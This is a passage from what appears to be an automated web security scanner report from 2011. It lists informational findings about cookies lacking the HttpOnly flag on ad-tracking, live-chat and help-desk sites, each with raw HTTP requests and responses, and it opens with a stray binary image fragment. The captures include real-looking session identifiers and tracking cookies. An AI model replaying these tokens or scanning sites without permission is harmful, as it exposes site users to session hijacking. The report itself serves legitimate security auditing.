......JFIF.....d.d......Ducky.......<.........R.u.s.s.i.a.n. .P.r.e.s.i.d.e.n.t. .D.m.i.t.r.y. .M.e.d.v.e.d.e.v. .i.s. .s.e.e.n. .a.g.a.i.n.s.t. .t.h.e. .b.a.c.k.g.r.o.u.n.d. .o.f. .R.u.s.s.i.a.'.s. .
...[SNIP]...
17.188. http://rbcgaru.hit.gemius.pl/_1303741244306/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741244306/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741244306/rexdot.gif?l=11&id=dv1K38epj5OVvUz_k_bVXZdS..OUmvCYJk0brLMVk1z.X7&tz=300&href=http%3A//pretty.ru/&ref=&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pretty.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gtestss=TyHLZcpeZ6QeXgn5D25OXPa7; Gdyn=KlS_MB9GvGQpqwo8SYS8RSpGLl2xMSy8rDOx5Rf1MG88inAs-QFjaGGM8GGaSbY3W5bQsj8GmbsxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:44:55 GMT
Expires: Sun, 24 Apr 2011 14:44:55 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=Fsn.sfn.IWGSprvHhyLhdPi7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlQbwQoGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REGT7r5vpXJc90jGFyFxGs..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;
17.189. http://rbcgaru.hit.gemius.pl/_1303741312919/rexdot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rbcgaru.hit.gemius.pl
Path:   /_1303741312919/rexdot.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_1303741312919/rexdot.gif?l=11&id=16LgHadxo4kFfevqG4Osi_UTDmyR8tuASw2dzIE9wLz.x7&tz=300&href=http%3A//pda.loveplanet.ru/&ref=http%3A//my.webalta.ru/&screen=1920x1200&col=16 HTTP/1.1
Host: rbcgaru.hit.gemius.pl
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Gtestss=4YEhxFlgK1uccYJIgsvm8f57; Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Gdyn=KlGUSB9GvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKvMaejey8CDBPMx8REQ58k5vpXJc90jGFyFxGs..

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:52:49 GMT
Expires: Sun, 24 Apr 2011 14:52:49 GMT
Accept-Ranges: none
Pragma: no-cache
Cache-Control: no-store, no-cache, must-revalidate, max-age=0
Set-Cookie: Gtestss=jWsrZem9.5JcOYXoINPbKvT7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gtestb=qtHAtEQHt0NRnbMaHgTBB_vxOXZuma22fdxwf2WrWlD.g7; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
Set-Cookie: Gdyn=KlxStQsGvGQpqwumpBLsoeG2GGGQ8Q7GEMQp-G3AKBDGXjey8CDBPMGGQaQGiag6Kq1W98ASFsjZxnaUMG..; Domain=hit.gemius.pl; Path=/; Expires=Tue, 05 Apr 2016 00:00:00 GMT
P3P: CP="NOI DSP COR NID PSAo OUR IND"
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!...
...,...........L..;
17.190. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel?pixelID=13893&partnerID=91&clientID=2693&key=segment&returnType=js HTTP/1.1
Host: segment-pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=719
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8218888f-9a83-4760-bd14-33b4666730c0; exchange_uid=eyIyIjogWyIyNzI0Mzg2MDE5MjI3ODQ2MjE4IiwgNzM0MjQ1XSwgIjQiOiBbIkNBRVNFQ0NyZjVYQkMyTExTQ3BjRWRBVjNzVSIsIDczNDI0NF19; partnerUID="eyIxOTkiOiBbIkJERkJGRkMyMzFBMjgyRDZFMjQ0NUI4RTRERTRBMkUwIiwgdHJ1ZV0sICI0OCI6IFsiNjIxMDk0NzA0Nzc4NjMwMDI2ODI4MzM4NDI2NDg1NDcxMjI4NzAiLCB0cnVlXX0="; subID="{}"; impressions="{\"578963\": [1303562003+ \"28aaa692-ea2e-30b9-be12-340089999af0\"+ 3241+ 40652+ 138]+ \"405594\": [1303072666+ \"2eefac09-883b-3f77-a8a9-19e6aac05dc5\"+ 22487+ 106641+ 227]}"; camp_freq_p1="eJzjkuFYMZ9VgFFict/ptywKjBqTmz+8ZTFgtADzuUQ4dt5nBsrOmr8WKMugwWDAYMEAAM06EHg="; io_freq_p1="eJzjEubYFirAKDG57/RbFgNGCzDNJcyx1wUoOGv+2rcsCgwaDAYMFgwAG9QMUw=="; dp_rec="{\"3\": 1303562003+ \"2\": 1303072666}"; segments_p1="eJzjYuE42M3IxcLR9J8JSDaDyc4OZiB56AgTFzPHdGMAkgUIPg=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 25 Apr 2011 14:40:42 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 25-Apr-2011 14:40:22 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: segments_p1="eJzjYuE42M3IxcLR9J8JSDYDSWaOozlAZmcHM5A8dAQkMN0YAMDqCYQ="; Domain=invitemedia.com; expires=Tue, 24-Apr-2012 14:40:42 GMT; Path=/
Content-Length: 343

makePixelRequest("http://ad.yieldmanager.com/pixel?id=772369&t=2","image");

function makePixelRequest(pixelURL,pixelType){

if(pixelType == "javascript")
{
document.write('<script src
...[SNIP]...
17.191. http://server.iad.liveperson.net/hc/48536788/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/48536788/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/48536788/?&site=48536788&cmd=mTagKnockPage&lpCallId=397980766836-120988531038&protV=20&lpjson=1&id=3689286436&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickKEY=44279450210220215; path=/hc/48536788
Set-Cookie: HumanClickACTIVE=1303746790924; expires=Tue, 26-Apr-2011 15:53:10 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 15:53:10 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2358

lpConnLib.Process({"ResultSet": {"lpCallId":"397980766836-120988531038","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...
17.192. http://server.iad.liveperson.net/hc/48536788/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/48536788/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/48536788/?&site=48536788&cmd=mTagKnockPage&lpCallId=388690866995-546840242110&protV=20&lpjson=1&id=3052401249&javaSupport=true&visitorStatus=INSITE_STATUS HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/content/about-internet-reputation-management-0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7046970874061540351; LivePersonID=-16601209214853-1303746790:-1:-1:-1:-1; HumanClickSiteContainerID_48536788=STANDALONE; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303746789908

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:54:05 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1303746845845; expires=Tue, 26-Apr-2011 15:54:05 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 15:54:05 GMT
Set-Cookie: HumanClickSiteContainerID_48536788=STANDALONE; path=/hc/48536788
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 2358

lpConnLib.Process({"ResultSet": {"lpCallId":"388690866995-546840242110","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'server.iad.liveper
...[SNIP]...
17.193. http://server.iad.liveperson.net/hc/48536788/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://server.iad.liveperson.net
Path:   /hc/48536788/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/48536788/?&site=48536788&cmd=mTagStartPage&lpCallId=181652786210-472512470558&protV=20&lpjson=1&page=http%3A//www.internetreputationmanagement.com/&id=3689286436&javaSupport=true&visitorStatus=INSITE_STATUS&activePlugin=none&cobrowse=true&PV%21visitorActive=1&title=Online%20Reputation%20Management%20%7C%20Internet%20Reputation%20Management&cookie=SESS66f1c041454c024a385686a578c40a41%3Dogb51ub0vsr90vi4u3afvog295%3B%20has_js%3D1%3B%20__utmz%3D1.1303746799.1.1.utmcsr%3D%28direct%29%7Cutmccn%3D%28direct%29%7Cutmcmd%3D%28none%29%3B%20__utma%3D1.1986090408.1303746799.1303746799.1303746799.1%3B%20__utmc%3D1%3B%20__utmb%3D1.1.10.1303746799 HTTP/1.1
Host: server.iad.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.internetreputationmanagement.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=7046970874061540351; LivePersonID=LP i=16601209214853,d=1303177644; HumanClickACTIVE=1303746789908

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 15:53:12 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickSiteContainerID_48536788=STANDALONE; path=/hc/48536788
Set-Cookie: LivePersonID=-16601209214853-1303746790:-1:-1:-1:-1; expires=Tue, 24-Apr-2012 15:53:12 GMT; path=/hc/48536788; domain=.liveperson.net
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 25 Apr 2011 15:53:12 GMT
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1998

lpConnLib.Process({"ResultSet": {"lpCallId":"181652786210-472512470558","lpCallConfirm":"","lpJS_Execute":[{"code_id": "SYSTEM!updateButtonStatic_compact.js", "js_code": "function lpUpdateStaticButton
...[SNIP]...
17.194. http://shopping.netsuite.com/s.nl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shopping.netsuite.com
Path:   /s.nl

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /s.nl?c=438708&n=1&sc=3&ext=T&promocode=&qtyadd=1&mboxSession=1303736347554-914602&Submit.x=43&productId=1650&Submit.y=8&whence= HTTP/1.1
Host: shopping.netsuite.com
Proxy-Connection: keep-alive
Referer: http://www.eset.com/us/store
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=dYyfN1wHZN71TmqdTHVPc5rfpmdrpWWkqQGJBTWHYGvFy6PP4kwCF9spppQp2p6T1y9LcTBvdSVRJT4zdGg0FbSwpQwRl5vyB94JHShTwbxX21bQLM8ycnhGDnyFQxbh!-2139436563; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NLPromocode=438708_; promocode=; NS_VER=2011.1.0

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 25 Apr 2011 12:59:55 GMT
Server: Apache
Location: /s.nl?c=438708&sc=3&whence=&qtyadd=1&n=1&mboxSession=1303736347554-914602&ext=T&Submit.x=43&productId=1650&Submit.y=8
NS_RTIMER_COMPOSITE: 1229161202:73686F702D6A6176613031322E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: NLPromocode=438708_; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
Set-Cookie: promocode=; domain=shopping.netsuite.com; expires=Monday, 02-May-2011 12:59:57 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
NLRedirectReason: redirect after consuming actionable parameters
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Content-Length: 0
Content-Type: text/html; charset=utf-8

17.195. http://show.multiclick.ru/blank.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://show.multiclick.ru
Path:   /blank.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /blank.php?place=2949&rnd=0.23312585408403952 HTTP/1.1
Host: show.multiclick.ru
Proxy-Connection: keep-alive
Referer: http://pda.loveplanet.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 25 Apr 2011 14:52:42 GMT
Content-Type: image/gif
Connection: close
Set-Cookie: mtclk=7972985092388468962; Expires=Sat, 22-Oct-2011 14:52:42 GMT
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Length: 49

GIF89a...................!.......,........@..T..;
17.196. http://sorry.google.com/sorry/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sorry.google.com
Path:   /sorry/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sorry/?continue=http://www.google.com/search%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3Dmalware%2Bvirus HTTP/1.1
Host: sorry.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=0772c9d5ef13aaaf:U=e1fa6a1c985d530f:TM=1303071569:LM=1303430315:S=G3Eo9Ou469J3cHp7; NID=46=G6tAQMMliMdgbUozp0g-12zJ4nIr9W3lVB7VLX4tvICbyeI1deRYnF0ETnjMaFRcDOw858z9ldTQARgCwUuLQTXPs03YWNQDMeYsf58qFzWq4-g9gJ1mhwHeRmKdbRzf

Response

HTTP/1.1 503 Service Unavailable
Set-Cookie: S=sorry=WbnEk7itoTuIPssOyKDfZA; path=/; domain=google.com
Date: Mon, 25 Apr 2011 15:52:01 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html
Server: GCS/1.0
Content-Length: 2689
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head><meta http-equiv="content-type" content="text/html; charset=utf-8"><title>http://www.google.com/search?sourceid=chrome&amp;
...[SNIP]...
17.197. http://stats.kroogy.com/cnt-gif1x1.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stats.kroogy.com
Path:   /cnt-gif1x1.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cnt-gif1x1.php?e=1920.1200&d=16&r=&p=http%3A//kroogy.com/&t=Kroogy%20Search%20-%20Home HTTP/1.1
Host: stats.kroogy.com
Proxy-Connection: keep-alive
Referer: http://kroogy.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cnscc=1303647928; __utmz=221607367.1303658380.5.3.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/index.php; __utma=221607367.144172721.1303647943.1303653223.1303658380.5; cnsuser_id=3793874385

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 13:38:44 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
P3P: policyref="/w3c/p3p.xml", CP="UNI"
Set-Cookie: cnsuser_id=3793874385; expires=Wed, 25-Apr-2012 23:59:59 GMT; path=/
Pragma: no-cache
Cache-control: no-cache
X-Powered-By: PleskLin
Vary: Accept-Encoding
Connection: close
Content-Type: image/gif
Content-Length: 43

GIF89a.............!.......,...........D..;
17.198. http://storage.trafic.ro/js/trafic.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storage.trafic.ro
Path:   /js/trafic.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js/trafic.js HTTP/1.1
Host: storage.trafic.ro
Proxy-Connection: keep-alive
Referer: http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:20:47 GMT
Server: Apache
Content-type: application/x-javascript
Expires: Thu, 11 Jan 1973 16:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:20:47 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="ALL IND DSP COR ADM CONo CUR IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: trafic_ranking=6c7f4ecfdd8l1dc980fda3f00c3621d0; expires=Sun, 11-Jan-2037 14:00:00 GMT; path=/; domain=.trafic.ro
Connection: close

t_js_dw_time=new Date().getTime();document.write('<scr' + 'ipt type="text/javascript" src="http://storage.trafic.ro/js/trafic.js?tk='+(Math.pow(10,16) * Math.random())+'&t_rid='+t_rid+'"></sc' + 'ript
...[SNIP]...
17.199. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /index.php HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/
Cache-Control: max-age=0
Origin: https://support.comodo.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a
Content-Length: 70

loginemail=&loginpassword=&Submit2=Login&_m=core&_a=login&querystring=

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:47:50 GMT
Server: Apache
Set-Cookie: SWIFT_loginemail=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Set-Cookie: SWIFT_loginpassword=deleted; expires=Sun, 25-Apr-2010 19:47:49 GMT; path=/
Content-Length: 917
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<html>
<head>
<title></title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="Refresh" content="1; URL=index.php?loginresult=-5&amp;group=comodo">

<!-- default s
...[SNIP]...
17.200. https://support.comodo.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://support.comodo.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?loginresult=-5&group=comodo HTTP/1.1
Host: support.comodo.com
Connection: keep-alive
Referer: https://support.comodo.com/index.php
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SWIFT_sessionid40=1g4f03q2uixdg6t4rvkbe9weba00vg2a

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:48:25 GMT
Server: Apache
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%223%22%3B%7D; expires=Tue, 24-Apr-2012 19:48:25 GMT; path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32488

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd"><html>
<head>
<title>Comodo - Kayako SupportSuite Help Desk Software</title>
<meta http-equiv=
...[SNIP]...
17.201. http://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://support.trust-guard.com
Path:   /index.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.php?_ca=css&group=default HTTP/1.1
Host: support.trust-guard.com
Proxy-Connection: keep-alive
Referer: http://support.trust-guard.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=147269874.1303748966.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SWIFT_sessionid40=nnfa18si4n87mc68kwytxeynpprc2i1o; SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; SWIFT_sessionid80=79aen2tq7o9d45p59q0nb8srhrs5qbvg; __utma=147269874.1166530582.1303748966.1303748966.1303758698.2; __utmc=147269874; __utmb=147269874.3.10.1303758698; SWIFT_visitor=a%3A4%3A%7Bs%3A11%3A%22countrycode%22%3Bs%3A4%3A%22none%22%3Bs%3A11%3A%22countryname%22%3Bs%3A4%3A%22none%22%3Bs%3A9%3A%22notecheck%22%3Bs%3A1%3A%221%22%3Bs%3A8%3A%22isbanned%22%3Bs%3A1%3A%220%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 19:12:09 GMT
Server: Apache/1.3.41 Ben-SSL/1.59
Cache-Control: max-age=3600, must-revalidate
Expires: Tue, 26 Apr 2011 19:12:13 GMT
X-Powered-By: PHP/5.2.17
Set-Cookie: SWIFT_client=a%3A1%3A%7Bs%3A7%3A%22groupid%22%3Bs%3A1%3A%221%22%3B%7D; expires=Tue, 24-Apr-2012 19:12:09 GMT; path=/
Content-Type: text/css
Content-Length: 14728


A:active {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;
}
A:visited {
   COLOR: #000000; TEXT-DECORATION: none; FONT-FAMILY: Verdana, Tahoma; FONT-SIZE: 11px;

...[SNIP]...
17.202. https://support.trust-guard.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
